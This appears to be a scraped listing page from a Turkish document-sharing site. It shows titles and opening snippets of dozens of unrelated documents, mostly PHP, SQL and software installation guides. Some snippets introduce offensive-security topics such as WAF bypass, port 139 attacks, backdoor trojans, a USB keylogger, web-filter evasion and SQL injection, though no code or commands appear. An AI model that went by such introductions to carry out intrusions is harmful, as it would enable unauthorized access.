(W)eb (A)pplication (F)irewall Bypass http://www.bga.com.tr bilgi@bga.com.tr Hakkımda Mehmet Dursun İnce ( @mmetince ) Penetration Tester @BGA Vuln. Researcher @BGA mehmet.ince@bga.com.tr WAF Nedir? WAF
DetaylıPHP I PHP I. E. Fatih Yetkin. 26 Eylül 2011
PHP I E. Fatih Yetkin 26 Eylül 2011 Outline Temel Tanımlar HTML e Giriş PHP ye Giriş MySQL ve PHP Temel Tanımlar Web Sunucu Nedir? Teknik detaylar bir kenara bırakılacak olursa, hazırlanan web sayfasını
DetaylıYILDIZ TEKNİK ÜNİVERSİTESİ
YILDIZ TEKNİK ÜNİVERSİTESİ ÖĞRENCİ E - POSTA KULLANIM KILAVUZU Kullanıcı Adı ve Şifrenin Öğrenilmesi E-Posta Hesabına Giriş Ad ve Soyad E-posta Hesaplarını Öğrenme ve Geçiş Hesabına Kolay Erişmek İçin
DetaylıBilgi ve Olay Yönetim Sistemi
1 Bilgi ve Olay Yönetim Sistemi Kurulum Kılavuzu Nisan 2016 Versiyon Sürüm 2.1.3 2 İçindekiler Bilgi ve Olay Yönetim Sistemi... 1 1. Sistem Gereksinimleri... 3 2. Kurulum... 3 3. Lisanslama... 10 4. Windows
DetaylıMicrosoft SQL Server 2008 Oracle Mysql (Ücretsiz) (Uygulamalarımızda bunu kullanacağız) Access
Programlamaya Giriş VERİ TABANI UYGULAMASI ÖN BİLGİ Veritabanları, verilere sistematik bir şekilde erişilebilmesine, depolanmasına ve güncellenmesine izin veren, yüksek boyutlu veriler için çeşitli optimizasyon
DetaylıGoogle Chrome Kullanıyorsanız; Microsoft Internet Explorer Kullanıyorsanız;
Öncelikle şöyle kısaca değinelim Proxy (Vekil sunucu) Nedir? Zaman zaman yetkili sunucu veya proxy olarak da anılan Vekil sunucu, internete erişim sırasında kullanılan bir ara sunucudur. Bu durumda, örneğin
DetaylıBİLGİSAYAR UYGULAMALARI Şırnak Üniversitesi Mühendislik Fakültesi Güz Dönemi Arş.Gör. Eren DEMİR ve Arş.Gör. Veysel KIŞ (
BİLGİSAYAR UYGULAMALARI Şırnak Üniversitesi Mühendislik Fakültesi 2018-19 Güz Dönemi Arş.Gör. Eren DEMİR ve Arş.Gör. Veysel KIŞ (e-mail: edemir@sirnak.edu.tr ) 04.10.2018 1 MATLAB da Workspace ve Workspace
Detaylı1.adım : Sql serverda Stored procedure oluşturmamız gerekiyor. Şu adımları izliyoruz.
Merhaba arkadaşlar ben YbsSoftware ekibi adına Güven AYDOĞDU : ) Vize haftası olması dolayısıyla bu dersimizi yazarak anlatacağız. Dersimizin konusu Stored Procedure ile Kayıt ekleme, Kayıt Silme ve Kayıt
DetaylıAMAÇLAR: GÜVENLİK TESTLERİNDE BİLGİ TOPLAMA: AKTİF BİLGİ TOPLAMA
HAFTA: 11.1 AMAÇLAR: GÜVENLİK TESTLERİNDE BİLGİ TOPLAMA: AKTİF BİLGİ TOPLAMA 1- Aktif Bilgi Toplama Hedef ile iletişime geçilerek olabildiğince fazla ve işe yarayan bilgi edinilmeye çalışılır. DNS Protokolü
DetaylıSamsun Çocuk Hizmetleri İ l Koordinasyon Sekretarya Birimi
Samsun Çocuk Hizmetleri İ l Koordinasyon Sekretarya Birimi Veri Giriş Sistemi Klavuzu Amaç Veri Giriş Sistemi, koruyucu ve destekleyici tedbir kararlarının takibinde ve uygulamasında ilgili kurumları daha
DetaylıBilgi ve Olay Yönetim Sistemi
1 Bilgi ve Olay Yönetim Sistemi Kurulum Kılavuzu Ağustos 2017 Versiyon Sürüm 2.2.5 2 İçindekiler Bilgi ve Olay Yönetim Sistemi... 1 1. Sistem Gereksinimleri... 3 2. Kurulum... 3 3. Lisanslama... 7 4. Windows
DetaylıYerel Ağlarda Port 139 ve Saldırı Yöntemi
Yerel Ağlarda Port 139 ve Saldırı Yöntemi Merhaba arkadaşlar. Gerek kitap hazırlığında olmam, gerekse de işlerimin oldukça yoğun olmasından dolayı, bir süredir makale yayınlayamadım. Bu süre boşluğunu
DetaylıInternet Programming II. Elbistan Meslek Yüksek Okulu Bahar Yarıyılı
Internet Programming II Elbistan Meslek Yüksek Okulu 2015 2016 Bahar Yarıyılı Öğr.Gör. Murat KEÇECĠOĞLU 8 Mar. 2016 PHP de Değişken Tipleri Dizi (Array) Aynı değişken içerisinde birden fazla değer tutmak
DetaylıWindows Live ID ve parolanızı giriniz.
Ücretsiz Deneme Hesabı Oluşturma ve Temel Özelliklerin Kullanım Kılavuzu Bilgi girilmesi gerekli alanlar Kişisel bilgi içeren alanlar http://www.windowsazure.com/tr-tr/pricing/free-trial/ adresine gidiniz
DetaylıDenetim Masası/Programlar/Windows özelliklerini Aç/Kapat
Merhaba arkadaşlar, Bu yazımızda yerel ağda veya Ip adresimizle bir web sitesinin paylaşıma açılması, aynı ağdan veya uzaktan bir bilgisayarın web sitemize nasıl erişebileceği konuları üzerinde duracağız.
DetaylıEndNote Web Hızlı Başvuru kartı
EndNote Web Hızlı Başvuru kartı THOMSON SCIENTIFIC Web öğrencilere ve araştırmacılara çalışmalarını yazarken yardımcı olacak şekilde tasarlanmış Web tabanlı bir servistir. ISI Web of Knowledge, EndNote,
DetaylıBilgisayar Uygulamaları. MySql
MySql MySql,; Oracle, Progress, MsSql, PostgreSql gibi veri tabanı programıdır. Kullanılan dil SQL (Structured Query Language) yapısal sorgulama dilidir. Lisansı GNU General Public License olarak bilinen
DetaylıKimsin Sen? /in/ahmet-dervis /adervis3 SauSiber adrvs.wordpress.com
DORK Kimsin Sen? a.dervis3@hotmail.com /in/ahmet-dervis /adervis3 SauSiber adrvs.wordpress.com Dork Nedir Ne Değildir? Bizim aramalarımızı daha kaliteli hale getiren, istediğimiz sonuca daha yakın aramalar
DetaylıWeb Application Penetration Test Report
Web Application Penetration Test Report Sızma testleri (Pentest) ve zayıflık tarama (Vulnerability Assessment) birbirine benzeyen iki aşamadan oluşur. Zayıflık tarama hedef sistemdeki güvenlik açıklıklarının
DetaylıWEB PROGRAMLAMA. PHP Temelleri 2. Dr. Erman Yukselturk
WEB PROGRAMLAMA PHP Temelleri 2 Dr. Erman Yukselturk Superglobal Değişkenler 1/4 Php de önceden tanımlanmış ve script in herhangi bir yerinden çağrılabilen ve çalıştirılabilen çevreye özel bilgiler sunan
DetaylıResponse : Sunucunun istemciye veri yollamasını
Response : Sunucunun istemciye veri yollamasını 27 Ekim 2011 / Perşembe Örnek : 2 tane sayfa açıyoruz,1nci ye TextBox1 ve Button ekliyoruz. Şunu istiyoruz,1nci sayfada şifre girilince, Button u tıklayınca
DetaylıYukarıdaki örnekte görüldüğü üzere her php komut satırı noktalı virgül (;) ile biter.
PHP Kod Yapısı Basit PHP Kod Yapısı PHP Scriptleri ile başlar ve ile biter. PHP Kodlarımız bu aralığa yazılır. Ayrıca çoğu sunucu
DetaylıMOBİLTEG MİKRO DEPO OTOMASYONU
MOBİLTEG MİKRO DEPO OTOMASYONU KURULUM KILAVUZU Mikro v.15 Entegre El Terminali Depo Otomasyonu kurulumu için öncelikle www.mikroelterminali.com adresine giriyoruz. Orada yer alan DEPO OTOMASYONU DEMO
Detaylıwww.vegayazilim.com.tr Tel: 0.312. 428 63 53
www.vegayazilim.com.tr Tel: 0.312. 428 63 53 VENDOR Araçta Muhasebe Sistemleri, araçta sıcak ve soğuk satış yapma imkanını saglayıcı çözümler sunan, plasiyer root takibatı yaparak iş kolaylığı, hız ve
DetaylıEn bilindik truva atları Xtreme Rat ve Darkcomet Rattır.
Merhaba Arkadaşlar Türkçede Arka Kapı olarak geçen Backdoor kelimesine uzak olmadığımız gibi yakında değiliz. Arka Kapı terimi Matrixfilminde ki Seraph karakterinin anahtarla açtığı kapılardan ileri gitmiyor.
DetaylıOrtam İzleyici Kullanım Kılavuzu
Ortam İzleyici Kullanım Kılavuzu BARAN ELEKTRONİK SİSTEMLERİ SAN. TİC. LTD. ŞTİ İçindekiler Ana Ekran... 2 Mail kurulum Ekranı... 3 Cihaz Ekleme ve Otomatik Tarama Ekranı... 4 Manuel Cihaz Ekleme ve Adlandırma...
DetaylıNEUTRON DDNS KURULUMU
1. Üyelik Oluşturma www.quickddns.com Web Adresine Giriş Sağlıyoruz. NEUTRON DDNS KURULUMU Yukarıda Resimde Gördüğünüz (Not Register?) Bağlantısına Tıklıyoruz. Yukarıdaki Gördüğünüz Sayfa Açıldığında (*)
DetaylıBOTAN SMS APİ DÖKÜMANI. www.botansms.com. Versiyon 1.0
BOTAN SMS APİ DÖKÜMANI www.botansms.com Versiyon 1.0 BİLMENİZ GEREKENLER 1- Api ile sms göndermek için internet sayfasından giriş yaptıktan sonra Kullanıcı İşlemleri menüsünden Bilgilerim tıklayarak Api
DetaylıEFe Event Management System
EFe Event Management System Kurulum Dökümanı Efe Event Management System V.0.5 Yazan Açıklama Tarih Aykut Güven EFEM İlk Versiyon 24.01.2018 İÇİNDEKİLER Ön Gereksinimler... 3 Tavsiye edilen konfigürasyon...
DetaylıUSB Keylogger İncelemesi
USB Keylogger İncelemesi Aşağıdaki fotoğrafta gördükleriniz her tür klavye girişine uygun keyloggerlar. USB keyloggerımızda bulunan özelliklerin en önemlisi kendisine ait bir depolama alanı olması. Biraz
DetaylıT.C. SAKARYA ÜNİVERSİTESİ ADAPAZARI MESLEK YÜKSEKOKULU WEB TABANLI VERİ TABANI UYGULAMASI YÖNLENDİRİLMİŞ ÇALIŞMA. Enes Al 1027.
T.C. SAKARYA ÜNİVERSİTESİ ADAPAZARI MESLEK YÜKSEKOKULU WEB TABANLI VERİ TABANI UYGULAMASI YÖNLENDİRİLMİŞ ÇALIŞMA Enes Al 1027.32121 BİLGİSAYAR PROGRAMCILIĞI DANIŞMAN: ÖĞR. GÖR. FERDA BOZKURT TEMMUZ 2012
DetaylıBilindik engelleme yöntemlerinin dışında olan, kurumsal web filitreleri nasıl aşılır?
Bilindik engelleme yöntemlerinin dışında olan, kurumsal web filitreleri nasıl aşılır? Not : Yazdıklarım tamamen öğretim amaçlıdır. Yaşanacak her türlü sıkıntının sorumlusu uygulayan kişidir. Sorumluluk
DetaylıTecCom TecLocal Programı Kurulum ve Yapılandırma Rehberi
TecCom TecLocal Programı Kurulum ve Yapılandırma Rehberi Giriş: TecLocal programı TecCom elektronik ticaret platformu üzerinden sisteme kayıtlı tedarikçi/distribütör firmalara bağlanmayı sağlayan ücretsiz
DetaylıGüvenlik Java ve Web Uygulama Güvenliği
Güvenlik Java ve Web Uygulama Güvenliği Melih Sakarya www.melihsakarya.com melih.sakarya@gmail.com www.mergecons.com Olası Açıklar Donanımsal açıklar Sistemsel Açıklar Yazılımsal Açıklar Sosyal Mühendislik
DetaylıSQL INJECTION. Mehmet TUNCER.
SQL INJECTION Mehmet TUNCER https://www.linkedin.com/in/mehmetuncer/ İÇİNDEKİLER SQL Injection Saldırılarına Giriş 3 SQL temelleri 3 Web Uygulaması İçinde SQL Sorguları 5 Hassas Dinamik Sorgular (Vulnerable
DetaylıWindows 2000 veya XP kurarken dosya sistemini seçmeniz gerekir. Ya FAT32 dosya sistemini kullanırsınız ya da NTFS.
Windows 2000 veya XP kurarken dosya sistemini seçmeniz gerekir. Ya FAT32 dosya sistemini kullanırsınız ya da NTFS. NTFS'nin FAT32'ye göre sağladığı bir çok avantajı vardır. Diski daha verimli kullanır.
DetaylıADO.NET VERİTABANINA BAĞLANTI. Bir web formu üzerinden veritabanına bağlantımızı anlatacağım. UYGULAMA 1
ADO.NET Web üzerinden veritabanına bağlanmak ve veri işlemleri gerçekleştirmek için ADO.NET teknolojinden faydalanarak işlemlerimizi gerçekleştireceğiz. ADO.NET her ne kadar ADO teknolojine benzesede aslında
DetaylıGeliştirici Referans Kılavuzu
Geliştirici Referans Kılavuzu Başlarken Nasıl geliştirildi? Kobetik, Ümit Tunç tarafından 2011 yılının Mayıs ayında kendisinin ayrıntılarla uğraşmadan daha hızlı yazılım yapabilmek için geliştirildiği
DetaylıÖğretim Üyesi Kullanıcı Kılavuzu ] EÜTF SoruBank Ege Üniversitesi Tıp Fakültesi. sürüm
Ege Üniversitesi Tıp Fakültesi EÜTF SoruBank www.sorubank.med.ege.edu.tr Öğretim Üyesi Kullanıcı Kılavuzu ] sürüm 2.0-2012 Ege Üniversitesi Tıp Fakültesi www.med.ege.edu.tr Giriş Sayın hocalarım ve değerli
DetaylıYEDEKLEME PROGRAMI KURULUM VE KULLANIMI
YEDEKLEME PROGRAMI KURULUM VE KULLANIMI Kurulum 1..zip dosyasını açınız. 2. Açılan dosyanın içindeki Yedekleme klasörünü açınız. 3. Yedekleme.exe dosyasını açınız. 4. Üst pencerede ki ekran gözükecektir.
Detaylı